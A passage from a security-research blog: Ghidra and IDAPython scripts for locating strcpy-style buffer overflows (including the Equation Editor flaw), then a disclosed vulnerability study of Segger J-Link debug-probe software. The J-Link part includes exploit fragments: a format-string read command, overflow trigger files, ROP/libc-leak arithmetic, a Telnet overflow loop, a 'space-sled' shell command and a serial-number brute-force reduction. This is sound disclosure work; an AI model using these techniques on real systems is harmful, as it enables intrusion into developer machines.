                graph.edge(parent_func_name,sink_name, label=call_addr.toString())
                duplicate = call_addr

ghidra_default_path = os.getcwd()
graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv")

#create the graph and view it using graphviz
graph.render(graph_output_file,view=True)

Running the script against our program shows the following graph:

ghidra_output10.png

We can see the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the line pointing to the sink.

After conducting some manual analysis, we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following WinDBG screenshot shows that EIP is overwritten with 0x42424242 as a result of an lstrcpyA function call.

ghidra_output15.png

Additional Features

Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats.

The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to let a user choose an output format (e.g., text, JSON, graph) and display the results in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available on our GitHub:

ghidra_output11.png
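A dropdown like the one above can be produced with the script API's askChoice() method; a minimal sketch:

# Prompt the user for an output format before running the analysis
choice = askChoice("Sink Detection", "Choose an output format",
                   ["text", "json", "graph"], "text")
print("Selected output format: " + choice)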

Limitations

There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function.

Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs. Occasionally, the standard library detection will fail.

ghidra_output12.png

By comparing IDA Pro and Ghidra’s disassembly output of CoreFTPServer, we can see that IDA Pro’s analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA.

Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research.

Conclusion

Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra’s API, we were able to develop a plugin that identifies sinks and their parent functions and displays the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugin’s vulnerability detection capabilities.

Introduction to IDAPython for Vulnerability Hunting - Part 2

Overview

In our last post we reviewed some basic techniques for hunting vulnerabilities in binaries using IDAPython. In this post we will expand upon that work and extend our IDAPython script to help detect a real Microsoft Office vulnerability that was recently found in the wild. The vulnerability that will be discussed is a remote code execution vulnerability that existed in the Microsoft Office EQNEDT32.exe component, also known as the Microsoft Office Equation Editor. This program was in the news in January when, due to a number of discovered vulnerabilities, Microsoft completely removed the application (and all of its functionality) from Microsoft Office in a security update. The vulnerabilities that ended up getting Equation Editor killed are exactly the type that we attempted to identify with the script written in the previous blog post. However, calls to strcpy in the Equation Editor application were optimized out and inlined by the compiler, rendering our previous script ineffective at locating the vulnerable strcpy usages.

While the techniques that we reviewed in the previous post are useful for finding a wide range of dangerous function calls, there are certain situations where the script as previously written will not detect the dangerous programming constructs that we intend and would expect it to detect. This most commonly occurs when compiler optimizations replace calls to string manipulation functions (such as strcpy and strcat) with inline assembly to improve program performance. Since this optimization removes the call instruction that we relied upon in the previous blog post, our previous detection method does not work in this scenario. In this post we will cover how to identify dangerous function calls even when the function call itself has been optimized out of the program and inlined.

Understanding the Inlined strcpy()

Before we are able to find and detect inlined calls to strcpy, we first need to understand what an inlined strcpy looks like. Let us take a look at the IDA Pro screenshot below, which shows the disassembly view side-by-side with the Hex-Rays decompiler output for an instance where a call to strcpy is inlined.

Example of inlined strcpy() - Disassembly on left, HexRays decompiled version on right

In the above screenshot, the decompiler output on the right side shows that a call to strcpy is made, but on the left side there is no corresponding call to strcpy in the disassembly. When looking for inlined string functions, a common feature of the inlined assembly to watch for is the use of the "repeat" instructions (rep, repnz, repz) to perform the string operations. With this in mind, let’s dig into the disassembly to see what the compiler used to replace strcpy.

 

First, we observe the instruction at 0x411646: `repne scasb`. This instruction is commonly used to get the length of a string (and is often emitted when strlen() is inlined by the compiler). Looking at the arguments used to set up the `repne scasb` instruction, we can see that it is getting the length of the string "arg_0". Since performing a strcpy requires knowing the length of the source string (and consequently the number of bytes/characters to copy), this is typically the first step in performing a strcpy.

 

Next we continue down and see two similar looking instructions: `rep movsd` and `rep movsb`. These instructions copy a string from the address in the esi register to the address in the edi register. The difference between the two is that `rep movsd` moves DWORDs from esi to edi, while `rep movsb` copies bytes. Both instructions repeat the copy a number of times based on the value in the ecx register.

 

Viewing the above code, we can observe that it uses the string length found by the `repne scasb` instruction to determine the size of the string being copied: following instruction 0x41164C, the length of the string is stored in both eax and ecx. Prior to executing the `rep movsd` instruction, ecx is shifted right by two, so only full DWORDs from the source string are copied to the destination. Then, at instruction 0x41165A, the stored string length is moved back into ecx and bitwise-ANDed with 3, so any remaining bytes that were not copied by `rep movsd` are copied to the destination.
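As a quick worked example of that length split (a small sketch; the length value is arbitrary):

length = 11                  # strlen(src), as computed by repne scasb
dword_copies = length >> 2   # rep movsd copies 2 DWORDs = 8 bytes
byte_copies = length & 3     # rep movsb copies the remaining 3 bytes
print("%d dword copies, %d byte copies" % (dword_copies, byte_copies))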

 

Automating Vuln Hunting with the Inlined strcpy()

Now that we understand how the compiler optimized the strcpy function calls, we can enhance our vulnerability hunting scripts to find instances where an inlined strcpy occurs. To help us do this, we will use the IDAPython API and the search functionality it provides. Looking at the above section, the instructions that are more or less unique to strcpy are `rep movsd` followed shortly thereafter by `rep movsb` to copy any remaining bytes.

 

So, using the IDAPython API to search for all instances of `rep movsd` followed by `rep movsb` 7 bytes later gives us the following code snippet:

 

ea = 0
while ea != BADADDR:
   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   if "movsb" in GetDisasm(addr+7):
       print "strcpy found at 0x%X"%addr

 

If we run this against the EQNEDT32.exe, then we get the following output in IDA Pro:

Output of Script Against EQNEDT32.exe

 

If we begin to look at all of the instances of inlined strcpy that the script reports, we find several cases where the script picks up other functions that are not strcpy but are similar. The most common function (other than strcpy) that this script detects is strcat(). Once we think about the similarities in functionality between those functions, it makes a lot of sense. Both strcat and strcpy are dangerous string copying functions that copy the entire length of a source string into a destination string regardless of the size of the destination buffer. Since strcat introduces the same dangers to an application as strcpy, finding both with the same script is a way to kill two birds with one stone.

 

Now that we have code to find inlined strcpy and strcat, we can combine it with our previous code to search specifically for inlined strcpy and strcat calls that copy data into stack buffers. This gives us the code snippet shown below:

 

# Check inline functions
info = idaapi.get_inf_structure()
ea = 0

while ea != BADADDR:
   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   _addr = ea

   if "movsb" in GetDisasm(addr+7):
       opnd = "edi" # Make variable based on architecture
       if info.is_64bit():
           opnd = "rdi"

      
       val = None
       function_head = GetFunctionAttr(_addr, idc.FUNCATTR_START)
       while True:
           _addr = idc.PrevHead(_addr)
           _op = GetMnem(_addr).lower()

           if _op in ("ret", "retn", "jmp", "b") or _addr < function_head:
               break

           elif _op == "lea" and GetOpnd(_addr, 0) == opnd:
               # We found the origin of the destination, check to see if it is in the stack
               if is_stack_buffer(_addr, 1):
                   print "0x%X"%_addr
                   break
               else: break

           elif _op == "mov" and GetOpnd(_addr, 0) == opnd:
               op_type = GetOpType(_addr, 1)

               if op_type == o_reg:
                   opnd = GetOpnd(_addr, 1)
                   addr = _addr
               else:
                   break

Running the above script and analyzing the results gives us a list of 32 locations in the code where a strcpy() or strcat() call was inlined by the compiler and used to copy a string into a stack buffer.

 

Improving Upon Previous Stack Buffer Check

Additionally, now that we have some additional experience with IDAPython, let us improve our previous scripts so that they are compatible with all recent versions of IDA Pro. Having scripts that work across versions of the IDA API can be extremely useful, as many IDA Pro users are still on the IDA 6 API while many others have upgraded to the newer IDA 7.

 

When IDA 7 was released, it came with a large number of changes to the API that were not backwards compatible. As a result, we need to perform a bit of a hack in order to make our is_stack_buffer() function compatible with both IDA 6 and IDA 7 versions of the IDA Python API. To make matters worse, not only has IDA modified the get_stkvar() function signature between IDA 6 and IDA 7, it also appears that they introduced a bug (or removed functionality) so that the get_stkvar() function no longer automatically handles stack variables with negative offsets.

 

As a refresher, I have included the is_stack_buffer() function from the previous blog post below:

def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)
   return get_stkvar(inst[idx], inst[idx].addr) != None

First, we introduce this functionality by wrapping our call to get_stkvar() in a try-except block and adding a variable to hold the value returned from get_stkvar(). Since our previous blog post targeted the IDA 6 family API, our "try" block will handle IDA 6 and will throw an exception on IDA 7, causing the IDA 7 API to be handled in our "except" block.

 

Now, to properly handle the IDA 7 API, in the except block we must pass an additional "instruction" argument to the get_stkvar() call and perform a check on the value of inst[idx].addr. We can think of inst[idx].addr as a signed integer that has been cast to an unsigned integer. Unfortunately, due to a bug in the IDA 7 API, get_stkvar() no longer performs the needed conversion of this value and, as a result, does not work properly on negative values of inst[idx].addr out of the box. This bug has been reported to the Hex-Rays team but, as of this writing, has not been patched, so we must convert negative numbers into the correct Python representation before passing them to the function. To do this, we check whether the sign bit of the value is set and, if it is, convert it to the proper negative representation using two's complement.

 

def twos_compl(val, bits=32):
   """compute the 2's complement of int value val"""
   
   # if sign bit is set e.g., 8bit: 128-255 
   if (val & (1 << (bits - 1))) != 0: 
       val = val - (1 << bits)        # compute negative value

   return val                             # return positive value as is

   
def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)

   # IDA < 7.0
   try:
       ret = get_stkvar(inst[idx], inst[idx].addr) != None

   # IDA >= 7.0
   except:
       from ida_frame import *
       v = twos_compl(inst[idx].addr)
       ret = get_stkvar(inst, inst[idx], v)

   return ret

 

Microsoft Office Vulnerability

The Equation Editor application makes a great example program since it was, until very recently, a widely distributed real-world application that we can use to test our IDAPython scripts. This application was an extremely attractive target for attackers since, in addition to being widely distributed, it also lacks common exploit mitigations including DEP, ASLR, and stack cookies.

 

Running the IDAPython script that we have just written finds and flags a number of addresses, including 0x411658. Further analysis reveals that this is the exact piece of code that caused CVE-2017-11882, the initial remote code execution vulnerability found in Equation Editor.

 

Additionally, in the time that followed the public release of CVE-2017-11882, security researchers began to turn their focus to EQNEDT32.exe due to the creative work done by Microsoft to manually patch the assembly (which prompted rumors that Microsoft had somehow lost the source code to EQNEDT32.exe). This increased interest within the security community led to a number of additional vulnerabilities being subsequently found in EQNEDT32.exe (with most of them being stack-buffer overflows). These vulnerabilities include: CVE-2018-0802, CVE-2018-0804, CVE-2018-0805, CVE-2018-0806, CVE-2018-0807, CVE-2018-0845, and CVE-2018-0862. While there are relatively scarce details surrounding most of those vulnerabilities, given the results of the IDAPython scripting that we have performed, we should not be surprised that a number of additional vulnerabilities were found in this application.

 

Posted on November 20, 2018 .

Infecting the Embedded Supply Chain

NOTE: This blog post is based on our DEF CON talk with the same title. If you would like to view the slides from DEF CON, they can be viewed here. Demonstration videos will be posted soon.

Overview

As IoT devices continue to become more and more commonplace, new threats and attack vectors are introduced that must be considered. Embedded devices contain a variety of distinct surfaces that a determined attacker could target. One such attack vector that must be considered is the development supply chain. In developing an IoT device, a development team requires a variety of special components, tools, and debuggers. Any of these products could be targeted by an attacker to compromise the integrity of the device that is being developed. With that in mind, we analyze the security of the Segger J-Link Debug Probes. Hardware debuggers, such as the J-Link, are critical tools in assisting developers with building embedded devices. Segger claims that their J-Link devices are “the most widely used debug probes in the world."

 

J-Link Attack Surface

The Segger J-Link debug probes come with a variety of supporting software packages that are used to interact with the probes. Included in this software are:

  • Many user-mode applications

  • USB driver

  • Full Integrated Development Environment (IDE)

Analyzing the user-mode applications distributed with the J-Link revealed that many of the applications were missing binary protections that help prevent successful exploitation of vulnerabilities. The analysis of the binary protections revealed:

  • DEP/NX was enabled

  • ASLR was enabled

  • PIE was not enabled

  • Stack canaries were NOT present in the *nix binaries but were present in the Windows binaries

  • SafeSEH was used in Windows binaries
     

As we began to analyze the applications included with J-Link, we quickly identified a number of input vectors that these applications accepted. These input vectors included command line arguments, files, and network interfaces. With this information in mind, we began to examine the applications’ security.

Vulnerability Research

After identifying input vectors and getting a feel for the applications, we decided to move forward with security analysis through a combination of fuzzing and reverse engineering. As we began to analyze these applications further and compare the Linux and Windows versions of the packages, we found that the majority of the code was cross-compiled. This made our lives easier, as we knew the functionality was nearly identical between the Windows and Linux versions of each application.

 

Additionally, we realized that much of the interesting application logic appeared to require traversing deep, complicated code paths to reach. As a result, we decided to use a generational fuzzing approach to achieve better coverage of these hard-to-reach code paths. This method involves using knowledge of the binary gathered from reverse engineering to determine the structure of data that each application expects to receive (and that leads to the "interesting" code sections), then recreating that data structure in our fuzzer's data specification format.

 

Since we were planning to generationally fuzz both network and file formats, we decided to use the Peach fuzzer. Peach allows us to define our data formats in a simple XML file and includes support for all of the desired input vectors (networking, files, command line) out of the box.

 

We then developed several data format specifications (known in Peach as pit files) and began fuzzing various J-Link applications. We started seeing crashes right away, but we also ran into issues: the J-Link debug probes would enter a bad state and become disconnected from the VM we were using for fuzzing. This halted our fuzzing, since the applications under test refuse to run properly without a J-Link device present.

 

To keep the J-Link attached to our VM, we developed a custom crash monitor that ensures the device is attached before each fuzzing iteration. The crash monitor fires on any crash that occurs while fuzzing and executes a user-specified set of actions. We wrote a script for it that uses libvirt to check whether the J-Link device is still attached to the VM and, if it is not, reattaches it. This allowed us to continue fuzzing the applications without issue.
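A minimal sketch of that reattach logic, written against the libvirt Python bindings, looks like the following. The domain name and USB product ID are assumptions (0x1366 is Segger's USB vendor ID), and our actual monitor script differed in its details:

import libvirt

VM_NAME = "fuzz-vm"                  # assumed name of the fuzzing VM's libvirt domain
JLINK_HOSTDEV = """
<hostdev mode='subsystem' type='usb'>
  <source>
    <vendor id='0x1366'/>   <!-- Segger's USB vendor ID -->
    <product id='0x0101'/>  <!-- placeholder product ID; varies by probe model -->
  </source>
</hostdev>
"""

def ensure_jlink_attached():
    conn = libvirt.open("qemu:///system")
    dom = conn.lookupByName(VM_NAME)
    # If the Segger vendor ID no longer appears in the domain XML, the probe
    # dropped off the VM after a crash, so hot-plug it back in.
    if "0x1366" not in dom.XMLDesc(0):
        dom.attachDevice(JLINK_HOSTDEV)
    conn.close()

if __name__ == "__main__":
    ensure_jlink_attached()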

 

Soon we were forced to halt our fuzzing efforts: we had observed so many crashes that the crash data stored by Peach was eating up our disk space. While triaging the results we noticed a few interesting things. First, a huge number of the crashes were identical and were automatically flagged as exploitable (thanks to !exploitable). These made up such a large portion of the total that our fuzzers achieved less coverage than we had initially hoped for. Further analysis revealed that, while we had built our data models to reach deep and interesting code paths, easy-to-trigger bugs early in the execution path were causing crashes before those targeted paths were ever reached.

 

Even though we received less coverage than we had hoped, we were still left with a variety of distinct crashes that appeared exploitable after initial triage. We then set out to see whether we could fully exploit any of the issues we had discovered.

 

Vulnerabilities Discovered

CVE-2018-9094 - Format String Vulnerability

One of the first vulnerabilities we found was a format string vulnerability, which can be demonstrated from the command line. Simply passing a format specifier (such as “%p”) as part of the file name causes the specifier to be interpreted rather than printed literally. We show this below, with “fileName%p” on the command line being converted to “fileName00922C0F” in the output.

Format String Vulnerability Demonstration


In the vulnerable application, JFlashSPI_CL.exe, a user-controlled string is inserted into a larger log message via sprintf. That log message is then passed as the first argument to a “printf-style” function which accepts format specifiers. The Hex-Rays decompiler output below clearly shows the vulnerable code.

Hex-Rays Output of the Source of the Vulnerability


Further reversing reveals that the “custom_printf” function shown above is a logging function included in the J-Link applications. It accepts a subset of printf's format specifiers and rejects the “%n” family that would allow arbitrary writes via a format string vulnerability. That said, it is still possible to generate an arbitrary read with this code.

 

We can demonstrate this with the following command:

JFlashSPI_CL.exe -open xAAAA%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%s

Running this command results in an arbitrary read, in this case from the address 0x41414141 (or “AAAA”), and causes the following exception to be thrown:

Exception Thrown when Reading Memory "AAAA"

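For illustration, a small wrapper along the following lines could automate finding how many %X specifiers are needed before %s consumes the planted "AAAA" pointer. The binary name and -open flag come from the example above; the exact count varies by build:

import subprocess

TARGET = "JFlashSPI_CL.exe"   # assumes the vulnerable binary is on PATH

for count in range(1, 64):
    # "AAAA" (0x41414141) lands on the stack; once enough %X specifiers have
    # consumed the earlier slots, %s dereferences it and the process faults.
    payload = "xAAAA" + "%X" * count + "%s"
    try:
        proc = subprocess.run([TARGET, "-open", payload],
                              capture_output=True, timeout=10)
    except subprocess.TimeoutExpired:
        continue
    if proc.returncode != 0:      # crash => %s reached our marker
        print(f"crash with {count} %X specifiers")
        break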

 

CVE-2018-9095 - Command File Stack Buffer Overflow

Next, we analyzed the crash that accounted for the vast majority of our total crashes and ate up most of our VM’s disk space. It turned out to be a traditional stack buffer overflow: a stack buffer can be overflowed by including a line of 511 or more characters in a command file parsed by the JLinkExe application.
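A minimal trigger can be generated with a couple of lines of Python and fed to JLinkExe with its standard -CommanderScript option:

# Write a command file containing one oversized line; in our testing any
# line of 511 or more characters overflowed the stack buffer.
with open("crash.jlink", "w") as f:
    f.write("A" * 512 + "\n")

# Reproduce with:
#   JLinkExe -CommanderScript crash.jlink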

 

Since this application is compiled with NX protections and runs with ASLR, we had to bypass both to exploit this vulnerability and gain arbitrary code execution. To bypass NX, we used return-oriented programming (ROP) to perform all of the operations needed to gain execution. Using Ropper, we searched through the ROP gadgets present in JLinkExe for a way to defeat ASLR and then gain execution. Because ASLR was enabled, we needed to determine the address of libc and, subsequently, system(). Fortunately, JLinkExe contains enough gadgets to leak the address of libc.

 

We leaked the address of libc using a traditional GOT dereference technique: dereference the GOT entry of some libc function, then use that value to calculate the address of the desired function, in our case system(), by adding or subtracting the static offset between the two functions.
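The address arithmetic that the ROP chain performs boils down to the following; the offsets shown are placeholders and must be taken from the exact libc build on the target:

# Hypothetical static offsets inside the target's libc
LIBC_PUTS_OFFSET   = 0x06f690   # placeholder offset of puts()
LIBC_SYSTEM_OFFSET = 0x045390   # placeholder offset of system()

def system_address(leaked_puts: int) -> int:
    """leaked_puts is the value read out of JLinkExe's GOT at runtime."""
    libc_base = leaked_puts - LIBC_PUTS_OFFSET
    return libc_base + LIBC_SYSTEM_OFFSET

# In the real exploit this subtraction and addition is performed by ROP
# gadgets operating on the leaked GOT value, not by Python.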

 

This left us needing to pass an argument to system() to gain code execution. Since this vulnerability is triggered by a file local to the exploited system, we focused on simply popping a shell rather than passing arbitrary, user-controlled payloads. That made finishing the exploit somewhat simpler, as we only had to find a suitable string to pass to system(). However, because we were unable to send null bytes, we were limited in which addresses we could pass as the argument. Our first thought was to use the “/bin/sh” string in libc, but its address contains a null byte, forcing us to look elsewhere. We therefore started looking at strings already present in the binary’s fixed address space and realized we had a number of options to work with:

 

$ strings JLinkExe | grep "sh$"
fflush
SWOFlush
.gnu.hash

 

By pointing system()’s argument into the middle of a string that ends in “sh”, we effectively pass the command “sh” to system(). This sidesteps the address limitations and launches a shell, giving us the execution we wanted.
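For reference, something along these lines (using pwntools, which is an assumption about tooling) will locate a null-byte-free pointer to such an "sh" suffix in the non-PIE binary:

from pwn import ELF

elf = ELF("./JLinkExe")             # non-PIE, so these addresses are absolute
width = elf.bits // 8               # pointer size in bytes

for addr in elf.search(b"sh\x00"):  # e.g. the tail of the "fflush" string
    # Skip candidates whose address would put a null byte into the payload.
    if b"\x00" not in addr.to_bytes(width, "little"):
        print(f"usable 'sh' string at {hex(addr)}")
        break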

CVE-2018-9097 - Settings File Buffer Overflow

In the course of our fuzzing we found another buffer overrun, this one triggered by a settings file parsed by JLinkExe. The overrun occurs in the BSS segment of a shared library used by the main executable, libjlinkarm.so.6.30.2. At this point we could write an arbitrary number of non-null bytes into that BSS segment, but we still needed a way to hijack control of execution, so we began looking at what our overwrite could reach.

 

Using the IDA Sploiter plugin for IDA Pro, we searched for writable function pointers that we could overwrite and identified several located after the overflowable buffer. A little more research turned up one that we could overwrite without crashing the application and that gets called soon after the overwrite, letting us consistently redirect execution to a user-controlled location. At that point we decided not to finish full exploitation of this vulnerability and to focus instead on the remote vulnerabilities we had found, since its attack vector and impact are so similar to those of CVE-2018-9095.
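Purely as an illustration, the overwrite payload has the following general shape; the buffer-to-pointer distance, the target address, and the settings file name are all placeholders rather than values recovered from the actual binary:

import struct

OFFSET_TO_FUNC_PTR = 0x400        # placeholder: distance from the BSS buffer to the pointer
FAKE_POINTER       = 0x42424242   # placeholder: address to redirect execution to (no null bytes)

payload  = b"A" * OFFSET_TO_FUNC_PTR            # non-null filler up to the function pointer
payload += struct.pack("<I", FAKE_POINTER)      # assumes a 32-bit pointer

with open("JLinkSettings.ini", "wb") as f:      # settings file name is an assumption
    f.write(payload)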

CVE-2018-9096 - Telnet Stack Buffer Overflow

One interesting observation from our initial analysis of the applications included with the J-Link was that one of them, JLinkRemoteServer, listens on a number of ports. Of particular interest to us was that it listens on port 23.

 

$ sudo netstat -tulpn | grep JLinkRemote
tcp        0 0 0.0.0.0:24              0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19080         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 0.0.0.0:19020           0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19021         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19030         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 0.0.0.0:23              0.0.0.0:* LISTEN 31417/./JLinkRemote

 

Since port 23 is commonly used for Telnet, we focused some of our reverse engineering effort on this executable to determine the purpose of the open port. Looking at this portion of the application in IDA Pro, we quickly confirmed that it is, in fact, a Telnet server.

Hex-Rays Output Showing the Creation of a Telnet Server Thread


With this information, we pointed our fuzzer at the open ports, concentrating on the Telnet server since it appeared to have the largest attack surface. Fuzzing it revealed one interesting crash that appeared exploitable but was difficult to reproduce. Additional analysis showed that the crash was the result of a stack buffer overflow, yet we still could not trigger it consistently. Further reversing revealed a race condition that determines whether the application crashes or keeps running.
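Because the crash only happens when the race falls the wrong way for the server, a simple retry loop is enough to exercise it. The sketch below is illustrative only; the target address and the payload are placeholders, not the actual exploit buffer:

import socket

TARGET = ("192.168.1.10", 23)       # assumed address of the JLinkRemoteServer host

def attempt(payload: bytes) -> None:
    with socket.create_connection(TARGET, timeout=5) as s:
        s.sendall(payload + b"\r\n")

oversized = b"A" * 0x1000           # placeholder oversized line
for _ in range(100):                # the race only crashes the server some of the time
    try:
        attempt(oversized)
    except OSError:
        break                       # connection refused/reset suggests the server went down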

 

While we could not trigger the crash consistently, we were able to write an exploit that succeeds in the instances where the race condition does cause the crash. To do so we followed a technique similar to our local stack buffer overflow exploit: a ROP chain leaks an address inside libc through a GOT dereference and then uses that leaked address to calculate the address of system().

 

Once we had the address of system(), we wanted the exploit to execute an arbitrary, user-controlled command. While examining program memory during exploitation, we found that user-controlled data was also being stored at static locations. Because JLinkRemoteServer is multithreaded, the data ended up at one of two possible locations. Since those locations are fairly close together in memory, we looked for a way to make the exploit work consistently regardless of which one the data landed at.

 

While brainstorming, we came up with a trick very similar to a nop-sled. With a nop-sled, a shellcode payload is prepended with many no-op instructions; execution can then be redirected anywhere into the sled and will still slide down into the payload, since the nops are valid instructions that do not change the program's state.

 

Thinking about this technique, we wondered whether something similar could be prepended to our text-based command payload to the same effect. We settled on prepending spaces, a trick we termed a “space-sled”: with enough spaces in front of the command, we can always point system() at the latter of the two candidate locations and, regardless of which one the user-controlled data was actually copied to, land in a usable portion of the command string.
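A sketch of the idea, with a placeholder sled length and command:

SLED_LEN = 0x100                    # placeholder: at least the distance between the two copies
command  = b" " * SLED_LEN + b"/bin/sh -c 'id > /tmp/pwned'"

# Whichever of the two static buffers the server copies this into, pointing
# system() at the higher of the two addresses lands somewhere in the run of
# spaces, and the shell skips the leading whitespace before running the command.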

CVE-2018-9093 - Tunnel Server Backdoor

Lastly, we have the J-Link tunnel server, which is effectively a backdoor to J-Link devices via a Segger proxy server. The tunnel server exists to enable remote debugging of embedded devices, but because it does not implement even the most basic security measures, it leaves any J-Link device using the feature open to attack.

 

When JLinkRemoteServer runs with a J-Link device attached, it registers the device's serial number with the Segger tunnel server. To access that device remotely, a client simply connects to the tunnel server and provides the serial number of the device it wishes to reach.

 

Since serial numbers are 9 decimal digits, there are one billion possible serial numbers. Assuming valid serial numbers are randomly distributed throughout this space and that we can check whether a serial number is connected at a rate of about 10 serial numbers per second (roughly what we’ve seen in our testing), it would take over three years to check the entire serial number space. That seemed large enough to make brute forcing serial numbers at scale generally infeasible for an attacker.

 

However, we realized that if we could shrink the search space, we could cut the time required to brute-force it. To do so, we began gathering as much information on device models and serial numbers as we could: we searched online for images of J-Link devices and read the serial numbers off of them, and we collected the serial numbers of every device we had access to. Between these two methods we gathered around 30 J-Link serial numbers to analyze.

 

After reviewing these serial numbers we were able to detect several patterns in the way that Segger assigned J-Link serial numbers. The serial numbers seemed to be divided into three distinct sections: device model, device version, and an incremented device number.

Segger Serial Number Divided into Sections


With this information, we were able to reduce the serial number space needed for good coverage of J-Link serial numbers from the initial one billion down to around 100,000. Using the same rate as above, that cuts the brute-force time from over three years to less than three hours. This reduction suddenly makes an attack on the Segger tunnel server much more appealing to an attacker.
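The back-of-the-envelope math, at the roughly 10 checks per second we observed:

RATE = 10                        # serial number checks per second (observed)

full_space    = 10 ** 9          # every 9-digit serial number
reduced_space = 100_000          # after constraining the model/version prefixes

print(f"full space:    {full_space / RATE / 86400 / 365.25:.1f} years")   # ~3.2 years
print(f"reduced space: {reduced_space / RATE / 3600:.1f} hours")          # ~2.8 hours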

 

Impact of Vulnerabilities

The vulnerabilities above are listed in increasing order of severity. Below we discuss each one and explain the potential impact of an attacker exploiting it.

 

The first vulnerability, CVE-2018-9094, cannot be used to gain code execution because of the custom format string function in use and, even if it could, it would remain low severity simply because of the input vector (the command line) used to exploit it.

 

Next up are CVE-2018-9095 and CVE-2018-9097. Both involve malicious files and yield code execution when such a file is opened by a J-Link application. They are more severe because malicious files are a common attack vector and can be spread via email or any other file transfer mechanism: an attacker could gain access to a system by getting an unwitting user to open a malicious file in a vulnerable application. These vulnerabilities are therefore high severity, though exploitation still relies on a user opening an untrusted file.

 

CVE-2018-9096 is our first remote vulnerability. It allows an attacker to gain code execution on a system remotely, without any interaction from the victim. This makes it critical, as an attacker can use it to spread throughout a network to any machine running the vulnerable application.

 

Lastly, we have CVE-2018-9093, perhaps the most severe of the set. It allows attackers to gain a foothold inside a network, bypassing firewalls and other perimeter defenses. Once inside, an attacker could read or write the firmware of any device attached to the remote J-Link. To make matters worse, exploiting it requires only knowledge of the Segger serial number scheme and a small amount of reverse engineering to recover the hardcoded “magic numbers” that Segger uses to establish a connection through their tunnel server.

Disclosure

Following this research, we disclosed these vulnerabilities to Segger on April 4, 2018. Segger acknowledged them shortly thereafter, and many of the issues have since been patched in subsequent releases of the J-Link software.

Conclusion/Takeaways

As we have previously demonstrated with our security research into Hello Barbie and electronic safe locks, many embedded devices have severe security flaws. If you are a developer or device manufacturer trying to build a secure device, it is just as important to consider your supply chain: as we have shown here, key elements of the development process often contain vulnerabilities that can compromise the integrity of the device being built, as well as the entire network.

 

Posted on August 11, 2018.